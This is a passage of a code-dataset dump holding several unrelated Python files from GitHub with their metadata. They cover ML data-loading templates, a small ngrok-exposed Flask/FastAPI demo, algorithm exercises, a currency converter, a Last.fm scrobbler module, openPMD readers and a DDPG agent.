For example, in our EEC process, preprocessed data are selected in part through KMeans algorithm and stored in CSV\n\"\"\" \n\nclass DataSetupTypeR1():\n def __init__(self, RAW_DF_DIR, TARGET_LABEL_NAME):\n super(DataSetupTypeR1, self).__init__() # nothing here btw\n\n self.RAW_DF_DIR = RAW_DF_DIR\n self.TARGET_LABEL_NAME = TARGET_LABEL_NAME \n self.load_data()\n\n def load_data(self):\n df = pd.read_csv(self.RAW_DF_DIR, index_col=False) \n features = [feature for feature in df if not feature == self.TARGET_LABEL_NAME]\n df_features = df.loc[:, features] \n\n self.df = df_features.to_numpy()\n self.df_target = df.loc[:, self.TARGET_LABEL_NAME] \n\nclass DatasetTypeR1(Dataset):\n def __init__(self, setupTypeR1):\n # setupTypeR1 is DataSetupTypeR1 (see above)\n super(DatasetTypeR1, self).__init__() # nothing here btw\n\n self.df = setupTypeR1.df\n self.df_target = setupTypeR1.df_target\n\n def __len__(self):\n return len(self.df)\n\n def __getitem__(self, i):\n # overwrite this function on case by case basis\n x = self.df[i]\n y0 = self.df_target[i]\n return x, y0 \n\n\n#############################################\n# TypeK1\n#############################################\n\"\"\" \n!! See data.py \"Data CONVENTION\" to distinguish between kFoldPrep and Dataset object.\n\nData is from CSV file. Data will be indexed for k-fold validation.\nCSV file can be loaded as pandas dataframe that has \n1. many columns, each contains ONLY numbers which can be normalized\n2. no missing or invalid data (data cleaning is done)\n3. one column for target (TARGET_LABEL_NAME). No restriction on data type of target.\n\nData Frame Type: NAIVE NUMERICAL DATAFRAME (refer to data.py for more details)\n\nFeatures are transformed with sklearn pipeline or anything similar that uses .transform()\nThe pipeline has been saved as a cache in DATA_CACHE_DIR\n\nSince this performs kfold validation, it's more suitable for smaller dataset:\n repeated training and validation of large models is computationally costly\n\"\"\"\n\nclass DataSetupTypeK1(kFoldPrep):\n # A kFoldPrep Object \n def __init__(self, DIRS, **kwargs):\n # Parent classes' initiations include\n # self.indices where\n # indices[k] = {'train': train_idx, 'val': val_idx, 'test': test_idx}\n self.TARGET_LABEL_NAME = kwargs['TARGET_LABEL_NAME']\n\n # temporary setup of DIRS because we wanna quickly load the data first \n # We will load the full dir via kFoldPrep init\n self.DIRS = {\n 'DATA_DIR': DIRS['DATA_DIR'],\n 'DATA_CACHE_DIR': DIRS['DATA_CACHE_DIR']} \n\n self.load_data() # load data first\n\n # This is the kFoldPrep init (super class)\n super(DataSetupTypeK1, self).__init__(DIRS, **kwargs)\n\n def load_data(self):\n from edattr.data import replace_invalid_cell_with_blank\n\n # !! Important !! This should mirror dfPP.process_dataframe() in data.py \n df = pd.read_csv(self.DIRS['DATA_DIR'], index_col=False) \n\n features = [feature for feature in df if not feature == self.TARGET_LABEL_NAME]\n df_features = df.loc[:, features] \n\n df_features = df_features.applymap(replace_invalid_cell_with_blank, ftype='numeric') \n \n cache = joblib.load(self.DIRS['DATA_CACHE_DIR'])\n pipe = cache['feature_transform_pipeline']\n\n self.df = pipe.transform(df_features) # = df_ \n self.df_target = df.loc[:, self.TARGET_LABEL_NAME] \n\n def get_data_size(self):\n return len(self.df)\n\nclass DatasetTypeK1(kSplitDataset):\n # Note: kSplitDataset is directly descended from a pytorch Dataset object (from torch.utils.data import Dataset). 
See data.py\n def __init__(self, setupTypeK1, k, split):\n # setupTypeK1 is DataSetupTypeK1() (see above)\n super(DatasetTypeK1, self).__init__(setupTypeK1, k, split)\n self.df = setupTypeK1.df \n self.df_target = setupTypeK1.df_target\n\n def __len__(self):\n return len(self.indices)\n\n def __getitem__(self, i):\n # overwrite this function on case by case basis\n idx = self.indices[i] # raw index from the CSV file\n x = self.df[idx]\n y0 = self.df_target[idx]\n return idx, x, y0 \n\n\n#############################################\n# TypeK2\n#############################################\n\"\"\" \n!! See data.py \"Data CONVENTION\" to distinguish between Setup Object (like kFoldPrep) and Dataset object.\n\nData is from CSV file. Data will be indexed for k-fold validation.\nCSV file can be loaded as pandas dataframe that has \n1. columns of data that can be converted to either (1) string (2) float.\n2. one column for target (TARGET_LABEL_NAME). No restriction on data type of target.\n\nData Frame Type: TokenAndFloat DATAFRAME (refer to data.py for more details)\n\n# Features are transformed with sklearn pipeline or anything similar that uses .transform()\n# The pipeline has been saved as a cache in DATA_CACHE_DIR\n\nSince this performs kfold validation, it's more suitable for smaller dataset:\n repeated training and validation of large models is computationally costly\n\"\"\"\n\n\nclass DataSetupTypeK2(kFoldPrep):\n def __init__(self, DIRS, **kwargs):\n self.TARGET_LABEL_NAME = kwargs['TARGET_LABEL_NAME']\n self.TOKEN_FEATURES = kwargs['TOKEN_FEATURES']\n self.NUMERICAL_FEATURES = kwargs['NUMERICAL_FEATURES']\n\n # temporary setup of DIRS because we wanna quickly load the data first \n # We will load the full dir via kFoldPrep init\n self.DIRS = {\n 'DATA_DIR': DIRS['DATA_DIR'],\n 'DATA_CACHE_DIR': DIRS['DATA_CACHE_DIR']} \n\n self.load_data() # load data first\n\n super(DataSetupTypeK2, self).__init__(DIRS, **kwargs)\n\n def load_data(self):\n df = pd.read_csv(self.DIRS['DATA_DIR'], index_col=False) \n\n cache = joblib.load(self.DIRS['DATA_CACHE_DIR'])\n NUMERICAL_FEATURES = cache['NUMERICAL_FEATURES']\n TOKEN_FEATURES = cache['TOKEN_FEATURES']\n word_to_ix = cache['word_to_ix']\n\n ##### numerical part #####\n pipe = cache['numerical_feature_transform_pipeline']\n df[NUMERICAL_FEATURES] = pipe.transform(df[NUMERICAL_FEATURES])\n\n ##### tokens part #####\n def word_to_ix_mapping(x):\n return word_to_ix[x] if x in word_to_ix else 0\n df[TOKEN_FEATURES] = df[TOKEN_FEATURES].applymap(word_to_ix_mapping) \n\n self.df = df\n self.df_target = df.loc[:, self.TARGET_LABEL_NAME] \n\n def get_data_size(self):\n return len(self.df)\n\nclass DatasetTypeK2(kSplitDataset):\n # setupTypeK2 is DataSetupTypeK2() (see above)\n def __init__(self, setupTypeK2, k, split):\n super(DatasetTypeK2, self).__init__(setupTypeK2, k, split)\n self.df = setupTypeK2.df \n self.df_target = setupTypeK2.df_target \n\n self.TARGET_LABEL_NAME = setupTypeK2.TARGET_LABEL_NAME\n self.TOKEN_FEATURES = setupTypeK2.TOKEN_FEATURES\n self.NUMERICAL_FEATURES = setupTypeK2.NUMERICAL_FEATURES\n\n def __len__(self):\n return len(self.indices)\n\n def __getitem__(self, i):\n # overwrite this function on case by case basis\n idx = self.indices[i] # raw index from the CSV file\n\n tokens = self.df[self.TOKEN_FEATURES].loc[idx].to_numpy()\n numerics = self.df[self.NUMERICAL_FEATURES].loc[idx].to_numpy()\n x = np.concatenate((tokens, numerics)) # convention: token first then numeric <-- the order matters!\n\n y0 = self.df_target[idx]\n 
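# note (added): returning the raw CSV index alongside x and y0 lets downstream code trace samples back to their source rows\n 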
return idx, x, y0 \n\n\n#############################################\n# TypeS2\n#############################################\n\"\"\" \n!! See data.py \"Data CONVENTION\" to distinguish between Setup Object (like kFoldPrep) and Dataset object.\n\nData is from CSV file. Data will be indexed for train/val/test\nCSV file can be loaded as pandas dataframe that has \n1. columns of data that can be converted to either (1) string (2) float.\n2. one column for target (TARGET_LABEL_NAME). No restriction on data type of target.\n\nData Frame Type: TokenAndFloat DATAFRAME (refer to data.py for more details)\n\n# Features are transformed with sklearn pipeline or anything similar that uses .transform()\n# The pipeline has been saved as a cache in DATA_CACHE_DIR\n\nThis is suitable for very large dataset. For example, if you have 100k (one hundred thousand) data points, you can draw 2k for validation and 2k for testing. You can always choose more data points for val/test if you have enough resources\n\"\"\"\n\nclass DataSetupTypeS2(StandardPrep):\n def __init__(self, DIRS, **kwargs):\n self.TARGET_LABEL_NAME = kwargs['TARGET_LABEL_NAME']\n self.TOKEN_FEATURES = kwargs['TOKEN_FEATURES']\n self.NUMERICAL_FEATURES = kwargs['NUMERICAL_FEATURES']\n\n # temporary setup of DIRS because we wanna quickly load the data first \n self.DIRS = {\n 'DATA_DIR': DIRS['DATA_DIR'],\n 'DATA_CACHE_DIR': DIRS['DATA_CACHE_DIR']} \n\n self.load_data() # load data first\n\n super(DataSetupTypeS2, self).__init__(DIRS, **kwargs)\n\n def load_data(self):\n df = pd.read_csv(self.DIRS['DATA_DIR'], index_col=False) \n\n cache = joblib.load(self.DIRS['DATA_CACHE_DIR'])\n NUMERICAL_FEATURES = cache['NUMERICAL_FEATURES']\n TOKEN_FEATURES = cache['TOKEN_FEATURES']\n word_to_ix = cache['word_to_ix']\n\n ##### numerical part #####\n from edattr.data import replace_invalid_cell_with_blank\n pipe = cache['numerical_feature_transform_pipeline']\n df[NUMERICAL_FEATURES] = df[NUMERICAL_FEATURES].applymap(replace_invalid_cell_with_blank, ftype='numeric').convert_dtypes() \n df[NUMERICAL_FEATURES] = pipe.transform(df[NUMERICAL_FEATURES])\n\n ##### tokens part #####\n def word_to_ix_mapping(x):\n return word_to_ix[x] if x in word_to_ix else 0\n df[TOKEN_FEATURES] = df[TOKEN_FEATURES].applymap(word_to_ix_mapping) \n\n self.df = df\n self.df_target = df.loc[:, self.TARGET_LABEL_NAME] \n\n def get_data_size(self):\n return len(self.df) \n\n def save_new_indices(self, n, DATA_STANDARD_INDICES_DIR, \n val_fraction=0.02, test_fraction=0.02, **kwargs):\n # Overwrite the default save_new_indices() function available in StandardPrep \n \n from .data import get_standard_weighted_indices\n self.indices = get_standard_weighted_indices(n, self.df_target, \n shuffle=self.shuffle, \n val_fraction=val_fraction, \n test_fraction=test_fraction,\n NOTE_DIR=DATA_STANDARD_INDICES_DIR + '.txt',\n )\n joblib.dump(self.indices, DATA_STANDARD_INDICES_DIR) \n\n\nclass DatasetTypeS2(StandardDataset):\n # setupTypeS2 is DataSetupTypeS2() (see above)\n def __init__(self, setupTypeS2, split):\n super(DatasetTypeS2, self).__init__(setupTypeS2, split)\n self.df = setupTypeS2.df \n self.df_target = setupTypeS2.df_target \n\n self.TARGET_LABEL_NAME = setupTypeS2.TARGET_LABEL_NAME\n self.TOKEN_FEATURES = setupTypeS2.TOKEN_FEATURES\n self.NUMERICAL_FEATURES = setupTypeS2.NUMERICAL_FEATURES\n\n def __len__(self):\n return len(self.indices)\n\n def __getitem__(self, i):\n # overwrite this function on case by case basis\n idx = self.indices[i] # raw index from the CSV file\n\n tokens 
= self.df[self.TOKEN_FEATURES].loc[idx].to_numpy()\n numerics = self.df[self.NUMERICAL_FEATURES].loc[idx].to_numpy()\n x = np.concatenate((tokens, numerics)) # convention: token first then numeric <-- the order matters!\n\n y0 = self.df_target[idx]\n return idx, x, y0 \n","repo_name":"ericotjo001/edattr.pypi","sub_path":"src/edattr/setup_template.py","file_name":"setup_template.py","file_ext":"py","file_size_in_byte":15584,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"13912501587","text":"'''\nAPI Flask\n'''\nfrom flask import *\nfrom flask_ngrok import run_with_ngrok\nfrom fastapi import FastAPI\nimport nest_asyncio\nfrom pyngrok import ngrok\nimport uvicorn\n\napp = Flask(__name__)\n\n\n@app.route('/index')\ndef home():\n return 'Hello World'\n\n\n# note: app.run() blocks, so the FastAPI section below only runs once the Flask server stops\nrun_with_ngrok(app)\napp.run()\n\napp = FastAPI()\n\n\n@app.get('/index')\nasync def home():\n return \"Hello World\"\n\n\nngrok_tunnel = ngrok.connect(8000)\nprint(\n 'Public URL:https://docs.google.com/spreadsheets/d/e/2PACX-1vR0dWHCZjcG96JzSkuV3UW5R5K-Fhlr-ZH0P9FSbXIlommHrGTlNek_RRmiCgQnvYbgx-A3Qo9JqGUg/pubhtml',\n ngrok_tunnel.public_url)\nnest_asyncio.apply()\nuvicorn.run(app, port=8000)\n","repo_name":"pauloarturob/Conhecendo_python-DIO","sub_path":"IntegrationWithMongo/API-Flask_dio-PauloArtur.py","file_name":"API-Flask_dio-PauloArtur.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13953634379","text":"import sys\ninput=sys.stdin.readline\n\nN=int(input())\nINF=(1e5)\ndp=[INF for _ in range(N+1)]\n\ndp[0]=0\n\nfor i in range(1,N+1):\n root=int(i**(1/2))\n for j in range(1,root+1):\n dp[i]=min(dp[i],dp[i-j*j]+1)\n\nprint(dp[N])\n","repo_name":"SongJeKang/goodkang","sub_path":"boj/2023_02_08/1699_squarenum.py","file_name":"1699_squarenum.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16011202021","text":"import json\nimport requests\n\nclass CurrencyTrading(object):\n \"\"\"Class for trading currency\"\"\"\n def __init__(self):\n data = requests.get(\"https://api.privatbank.ua/p24api/pubinfo?json&exchange&coursid=5\")\n self.json = data.json()\n self.course = [[d[i] for i in d] for d in self.json]\n @property\n def currencys(self):\n return [\"USD\", \"EUR\", \"RUB\", \"UAH\"]\n # return a list with the result and value\n def trade(self, curr_from, curr_to, amount_of_money): \n if curr_from in self.currencys and curr_to in self.currencys and curr_from != curr_to:\n try:\n money = float(amount_of_money)\n if money <= 0:\n raise Exception\n #\n if curr_from != \"UAH\":\n money *= float(self.course[self.currencys.index(curr_from)][2])\n if curr_to != \"UAH\":\n money /= float(self.course[self.currencys.index(curr_to)][2])\n else:\n money /= float(self.course[self.currencys.index(curr_to)][3])\n # format the money amount to two decimal places (kopecks)\n return [\"Success trade\", float(\"\".join(str(money)[0:(str(money).find(\".\")+3)]))]\n except Exception:\n return [\"Wrong amount of money\", -1]\n else:\n return [\"Wrong currency\" if (curr_from != curr_to) else \"Currencies must be different\" , -1]","repo_name":"Mxkxk/DataProcessing","sub_path":"Labs/Lab8/CurrencyTrading.py","file_name":"CurrencyTrading.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30686276345","text":"# Josephus 
problem\nimport sys\nn, k = map(int, sys.stdin.readline().rstrip().split())\narr = [i for i in range(1, n + 1)]\nresult = []\nnum = k - 1\n\nfor i in range(n):\n if len(arr) <= num:\n num = num % len(arr)\n result.append(arr.pop(num))\n num += k - 1\nprint('<%s>' %(', '.join(list(map(str, result)))))","repo_name":"jisuuuu/Algorithm_Study","sub_path":"Baekjoon/Baekjoon_python/boj_1158.py","file_name":"boj_1158.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21906987906","text":"from __future__ import annotations\n\nimport logging\nfrom typing import Iterable, Optional, TypedDict, cast\n\nimport pykka\nimport pylast\n\nfrom mopidy_advanced_scrobbler.models import Play, RecordedPlay\n\nfrom ._service import Service\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass NetworkException(Exception):\n pass\n\n\nclass NowPlayingData(TypedDict):\n artist: str\n title: str\n album: Optional[str]\n mbid: Optional[str]\n duration: Optional[int]\n\n\nclass _PartialNowPlayingData(TypedDict, total=False):\n artist: str\n title: str\n album: Optional[str]\n mbid: Optional[str]\n duration: Optional[int]\n\n\nclass PlayData(NowPlayingData):\n timestamp: int\n\n\ndef format_now_playing_data(play: Play) -> NowPlayingData:\n data: _PartialNowPlayingData = {\n \"artist\": play.artist,\n \"title\": play.title,\n }\n\n if play.album:\n data[\"album\"] = play.album\n else:\n data[\"album\"] = None\n if play.duration:\n data[\"duration\"] = play.duration\n else:\n data[\"duration\"] = None\n if play.musicbrainz_id:\n data[\"mbid\"] = play.musicbrainz_id\n else:\n data[\"mbid\"] = None\n\n return cast(NowPlayingData, data)\n\n\ndef format_play_data(play: Play) -> PlayData:\n base_data = format_now_playing_data(play)\n\n data: PlayData = {\n **base_data,\n \"timestamp\": play.played_at,\n }\n\n return data\n\n\nclass AdvancedScrobblerNetwork(pykka.ThreadingActor):\n def __init__(self, config):\n super().__init__()\n self._config = config\n self._network = None\n\n def on_start(self):\n try:\n logger.info(\"Connecting to Last.fm with username %s\", self._config[\"username\"])\n self._network = pylast.LastFMNetwork(\n api_key=self._config[\"api_key\"],\n api_secret=self._config[\"api_secret\"],\n username=self._config[\"username\"],\n password_hash=pylast.md5(self._config[\"password\"]),\n )\n logger.debug(\"Connected to Last.fm with username %s\", self._config[\"username\"])\n except pylast.PyLastError as exc:\n logger.exception(f\"Error during Advanced-Scrobbler Last.fm setup: {exc}\")\n raise\n\n def send_now_playing_notification(self, play: Play):\n now_playing_data = format_now_playing_data(play)\n\n logger.info(\"Sending 'now playing' notification: %s\", play.track_uri)\n try:\n self._network.update_now_playing(**now_playing_data)\n except pylast.PyLastError as exc:\n logger.exception(f\"Error while sending now playing data to {self._network}: {exc}\")\n raise NetworkException(\n f\"Error while sending now playing data to {self._network}\"\n ) from exc\n\n def submit_scrobble(self, play: RecordedPlay):\n play_data = format_play_data(play)\n\n logger.info(\"Submitting scrobble for play %d: %s\", play.play_id, play.track_uri)\n try:\n self._network.scrobble(**play_data)\n except pylast.PyLastError as exc:\n logger.exception(f\"Error while submitting scrobble to {self._network}: {exc}\")\n raise NetworkException(f\"Error while submitting scrobble to {self._network}\") from exc\n\n def submit_scrobbles(self, plays: 
Iterable[RecordedPlay]):\n plays_data = []\n play_ids = []\n for play in plays:\n plays_data.append(format_play_data(play))\n play_ids.append(play.play_id)\n\n logger.info(\"Submitting scrobbles for plays: %s\", \", \".join(map(str, play_ids)))\n try:\n self._network.scrobble_many(plays_data)\n except pylast.PyLastError as exc:\n logger.exception(f\"Error while submitting scrobbles to {self._network}: {exc}\")\n raise NetworkException(f\"Error while submitting scrobbles to {self._network}\") from exc\n\n\nnetwork_service = Service(AdvancedScrobblerNetwork)\n","repo_name":"djmattyg007/mopidy-advanced-scrobbler","sub_path":"mopidy_advanced_scrobbler/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"1346581029","text":"import numpy as np\n\n\ndef chunk_to_slice(chunk):\n \"\"\"\n Convert an openPMD_api.ChunkInfo to slice\n \"\"\"\n stops = [a + b for a, b in zip(chunk.offset, chunk.extent)]\n indices_per_dim = zip(chunk.offset, stops)\n index_tuple = map(lambda s: slice(s[0], s[1], None), indices_per_dim)\n return tuple(index_tuple)\n\n\ndef get_data(series, record_component, i_slice=None, pos_slice=None,\n output_type=None):\n \"\"\"\n Extract the data from a (possibly constant) dataset\n Slice the data according to the parameters i_slice and pos_slice\n\n Parameters:\n -----------\n series: openpmd_api.Series\n An open, readable openPMD-api series object\n\n record_component: an openPMD.Record_Component\n\n pos_slice: int or list of int, optional\n Slice direction(s).\n When None, no slicing is performed\n\n i_slice: int or list of int, optional\n Indices of slices to be taken.\n\n output_type: a numpy type\n The type to which the returned array should be converted\n\n Returns:\n --------\n An np.ndarray (non-constant dataset) or a single double (constant dataset)\n \"\"\"\n # For back-compatibility: Convert pos_slice and i_slice to\n # single-element lists if they are not lists (e.g. 
float\n # and int respectively).\n if pos_slice is not None and not isinstance(pos_slice, list):\n pos_slice = [pos_slice]\n if i_slice is not None and not isinstance(i_slice, list):\n i_slice = [i_slice]\n\n # ADIOS2: Actual chunks, all other: one chunk\n chunks = record_component.available_chunks()\n\n # mask invalid regions with NaN: fill value\n # note: NaN is only defined for floating point types\n NaN_value = np.nan if np.issubdtype(record_component.dtype, np.floating) or np.issubdtype(record_component.dtype, np.complexfloating) else 0\n\n # read whole data set\n if pos_slice is None:\n # mask invalid regions with NaN\n # note: full_like triggers a full read, thus we avoid it #340\n data = np.full(record_component.shape, NaN_value, record_component.dtype)\n\n for chunk in chunks:\n chunk_slice = chunk_to_slice(chunk)\n\n # skip empty slices\n # https://github.com/ornladios/ADIOS2\n volume = 1\n for csl in chunk_slice:\n volume *= csl.stop - csl.start\n if volume == 0:\n continue\n\n # read only valid region\n x = record_component[chunk_slice]\n series.flush()\n data[chunk_slice] = x\n # slice: read only part of the data set\n else:\n full_shape = record_component.shape\n\n slice_shape = list(full_shape) # copy\n pos_slice_sorted = pos_slice.copy() # copy for in-place sort\n pos_slice_sorted.sort(reverse=True)\n for dir_index in pos_slice_sorted: # remove indices in list\n del slice_shape[dir_index]\n\n # mask invalid regions with NaN\n data = np.full(slice_shape, NaN_value, dtype=record_component.dtype)\n\n # build requested ND slice with respect to full data\n s = []\n for d in range(len(full_shape)):\n if d in pos_slice:\n s.append(i_slice[pos_slice.index(d)]) # one index in such directions\n else: # all indices in other direction\n s.append(slice(None, None, None))\n s = tuple(s)\n\n # now we check which chunks contribute to the slice\n for chunk in chunks:\n skip_this_chunk = False\n s_valid = list(s) # same as s but reduced to valid regions in chunk\n s_target = [] # starts and stops in sliced array\n chunk_slice = chunk_to_slice(chunk)\n\n # skip empty slices\n # https://github.com/ornladios/ADIOS2\n volume = 1\n for csl in chunk_slice:\n volume *= csl.stop - csl.start\n if volume == 0:\n continue\n\n # read only valid region\n for d, slice_d in enumerate(s):\n start = chunk_slice[d].start\n stop = chunk_slice[d].stop\n if isinstance(slice_d, int):\n # Nothing to do for s_target (dimension sliced out)\n # Nothing to do for s_valid (dimension index is set)\n if slice_d < start or slice_d >= stop:\n # chunk not in slice line/plane\n skip_this_chunk = True\n else:\n if slice_d.start is None or slice_d.start < start:\n s_valid[d] = slice(start, s_valid[d].stop)\n if slice_d.stop is None or slice_d.stop > stop:\n s_valid[d] = slice(s_valid[d].start, stop)\n s_target.append(slice(start, stop))\n\n s_valid = tuple(s_valid)\n s_target = tuple(s_target)\n\n # read\n if not skip_this_chunk:\n x = record_component[s_valid]\n series.flush()\n data[s_target] = x\n\n # Convert to the right type\n if (output_type is not None) and (data.dtype != output_type):\n data = data.astype( output_type )\n # Scale by the conversion factor\n if record_component.unit_SI != 1.0:\n if np.issubdtype(data.dtype, np.floating) or \\\n np.issubdtype(data.dtype, np.complexfloating):\n data *= record_component.unit_SI\n else:\n data = data * record_component.unit_SI\n\n return data\n\n\ndef join_infile_path(*paths):\n \"\"\"\n Join path components using '/' as separator.\n This method is defined as an alternative 
to os.path.join, which uses '\\\\'\n as separator in Windows environments and is therefore not valid to navigate\n within data files.\n\n Parameters:\n -----------\n *paths: all strings with path components to join\n\n Returns:\n --------\n A string with the complete path using '/' as separator.\n \"\"\"\n # Join path components\n path = '/'.join(paths)\n # Correct double slashes, if any are present\n path = path.replace('//', '/')\n\n return path\n","repo_name":"openPMD/openPMD-viewer","sub_path":"openpmd_viewer/openpmd_timeseries/data_reader/io_reader/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":6124,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"72"} +{"seq_id":"20507695821","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport DWM10_Parms\ndef transitiveClosure(pairList):\n    logFile = DWM10_Parms.logFile\n    print('\\n>>Starting DWM80')\n    print('\\n>>Starting DWM80', file=logFile)\n    # Bootstrap the process by adding the reverse and self-pair of every pair to the pairList\n    iterationCnt = 0\n    clusterList = []\n    for pair in pairList:\n        clusterList.append(pair)\n        pairRev = (pair[1],pair[0])\n        clusterList.append(pairRev)\n        pairSelf = (pair[0],pair[0])\n        clusterList.append(pairSelf)\n    pairList = []\n    # Change 2.10\n    pairList = list(set(clusterList))\n    # Sort pairs in order by the first position (the key)\n    pairList.sort()\n    #print('***sorted pairList size =', len(pairList))\n    #print('***sorted pairList =', pairList)\n    # All of the pairs with the same key are a Key Group\n    clusterList = []\n    moreWorkToDo = True\n    iteration = 0\n    while moreWorkToDo:\n        moreWorkToDo = False\n        iteration +=1\n        # Add a caboose record to the end of the pairList\n        caboose = ('---','---')\n        pairList.append(caboose)\n        keyGroup = []\n        for j in range(0,len(pairList)-1):\n            currentPair = pairList[j]\n            keyGroup.append(currentPair)\n            # Look ahead to the next key\n            nextPair = pairList[j+1]\n            currentKey = currentPair[0]\n            nextKey = nextPair[0]\n            # When the next key is different, we are at the end of a Key Group and ready to process keyGroup\n            if currentKey != nextKey:\n                firstGroupPair = keyGroup[0]\n                firstGroupPairKey = firstGroupPair[0]\n                firstGroupPairValue = firstGroupPair[1]\n                # Add new pairs to clusterList from key groups that start with a reversed pair and contain more than 1 pair\n                keyGroupSize = len(keyGroup)\n                if firstGroupPairKey > firstGroupPairValue:\n                    if keyGroupSize>1:\n                        moreWorkToDo = True\n                        for k in range(keyGroupSize):\n                            groupPair = keyGroup[k]\n                            groupPairValue = groupPair[1]\n                            newPair = (firstGroupPairValue, groupPairValue)\n                            clusterList.append(newPair)\n                            newReversePair = (groupPairValue, firstGroupPairValue)\n                            clusterList.append(newReversePair)\n                    # Decide if first pair of keyGroup should move over to clusterList\n                    lastGroupPair = keyGroup[keyGroupSize-1]\n                    lastGroupPairValue = lastGroupPair[1]\n                    if firstGroupPairKey < lastGroupPairValue:\n                        clusterList.append(firstGroupPair) \n                else:\n                    # pass other key groups forward to cluster list\n                    clusterList.extend(keyGroup)\n                keyGroup = []\n        pairList = []\n        # Change 2.10\n        pairList = list(set(clusterList))\n        pairList.sort()\n        iterationCnt +=1\n        clusterList = []\n    print('Total Closure Iterations =',iterationCnt)\n    print('Total Closure Iterations =',iterationCnt, file=logFile)\n    print('Size of Cluster List =', len(pairList))\n    return 
pairList\n\n","repo_name":"OnaisKhanMohammed/Census-Linking","sub_path":"DWM80_TransitiveClosure.py","file_name":"DWM80_TransitiveClosure.py","file_ext":"py","file_size_in_byte":3291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30941651499","text":"#!/usr/bin/env python3\n\n\"\"\"Reinforcement-learning based best-response policies.\"\"\"\nimport logging\nfrom numpy import array, float32\nfrom random import Random\nfrom time import time\n\nfrom model import Model\nfrom test import test_model, test_attack_action\n\nfrom utils import ReplayBuffer\nfrom utils import ActorNetwork\nfrom utils import CriticNetwork\n\n\nimport itertools\nimport numpy as np \nimport tensorflow as tf\n\n\nBUFFER_SIZE = 10000\nBATCH_SIZE = 32\nGAMMA = 0.99\nTAU = 0.001 # target Network HyperParameters\nLRA = 0.01#0.0001 # learning rate for Actor\nLRC = 0.01#0.001 # lerning rate for Critic\n\nnp.random.seed(133)\nEXPLORE = 1000\nepisode_count = 2#2000 # number of episodes\nmax_steps = 1000#10000 # self.steps in each episode\nreward = 0\n\n#Tensorflow GPU optimization\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\nfrom keras import backend as K\nK.set_session(sess)\n\ndef normalized(vect):\n \"\"\"\n Normalize the given vector.\n :param vect: Vector represented as a list of floats.\n :return: Normalized vector represented as a list of floats.\n \"\"\"\n factor = 1 / sum(vect)\n return [element * factor for element in vect]\n\nclass DDPGAgent:\n \"\"\"\n Learning algorithm inspired by Q-learning. \n States are represented as lists of arbitrary floats, while actions are represented as normalized lists of floats (i.e., floats are greater than or equal to zero and sum up to one).\n Differences compared to Q-learning are described in the documentation of the relevant functions.\n \"\"\"\n\n def __init__(self, state_size, action_size):\n \"\"\"\n Construct a learning algorithm object.\n :param state_size: Length of lists representing states.\n :param action_size: Length of lists representing actions.\n \"\"\"\n self.state_size = state_size\n self.action_size = action_size\n self.actor = ActorNetwork(sess, self.state_size, self.action_size, BATCH_SIZE, TAU, LRA)\n self.critic = CriticNetwork(sess, self.state_size, self.action_size, BATCH_SIZE, TAU, LRC)\n self.buff = ReplayBuffer(BUFFER_SIZE) \n self.step = 0\n self.epsilon = 1\n \n def learn(self, initial_state, state_observe, state_update, rnd=Random(0)):\n \"\"\"\n Q-learning based algorithm for learning the best actions in every state.\n Note that due to performance reasons, the state-value function (i.e., Q) is not updated after every self.step, but only in batches.\n :param initial_state: Initial state, represented as an arbitrary object (note that this can be of a different format than the states used in other functions of QLearning).\n :param state_observe: Observes the state. Function, takes either initial_state or a state output by state_update, returns a list of floats (of length state_size).\n :param state_update: Updates the state based on an action. 
Function, takes a state (see state_observe) and an action (normalized list of floats), returns a tuple of the next state (may be an arbitrary object) and the loss incurred.\n :param rnd: Random number generator.\n \"\"\"\n logging.info(\"DDPG algorithm starts.\")\n for i in range(episode_count):\n logging.info(\"Episode: %s Replay Buffer: %s\", str(i), str(self.buff.count()))\n state_t = initial_state \n s_t = np.array([state_observe(initial_state)]) # initial observation state\n total_reward = 0.\n\n for j in range(max_steps):\n loss = 0 \n self.epsilon -= 1.0 / EXPLORE \n a_t = np.zeros([1, self.action_size])\n noise_t = np.zeros([1, self.action_size]) # a noise process to select action\n \n # select action according to the current policy and exploration noise\n a_t_original = self.actor.model.predict(s_t)\n for k in range(self.action_size):\n noise_t[0][k] = max(self.epsilon, 0)*np.random.normal(0, 0.1, 1)[0] # the noise follows a Gaussian distribution\n a_t[0][k] = a_t_original[0][k]+noise_t[0][k]\n if a_t[0][k] < 0:\n a_t[0][k] = 0.05 # before normalization, we should make sure a_t[0][k] >= 0\n # normalize the action\n sum_action = sum(a_t[0])\n for k in range(self.action_size):\n a_t[0][k] = a_t[0][k]*1.0/sum_action \n #print(j, a_t[0])\n (state_t1, loss_t) = state_update(state_t, list(a_t[0]))\n r_t = -1*loss_t # reward of the defender is -1*its loss \n s_t1 = np.array([state_observe(state_t1)])\n\n self.buff.add(s_t[0], a_t[0], r_t, s_t1[0]) # add transition to the replay buffer\n\n # Do the batch update\n batch = self.buff.getBatch(BATCH_SIZE)\n states = np.asarray([e[0] for e in batch])\n actions = np.asarray([e[1] for e in batch])\n rewards = np.asarray([e[2] for e in batch])\n new_states = np.asarray([e[3] for e in batch])\n y_t = np.asarray([[0.0] for e in batch]) # float array so TD targets are not truncated\n\n\n\n target_q_values = self.critic.target_model.predict([new_states, self.actor.target_model.predict(new_states)]) \n\n for k in 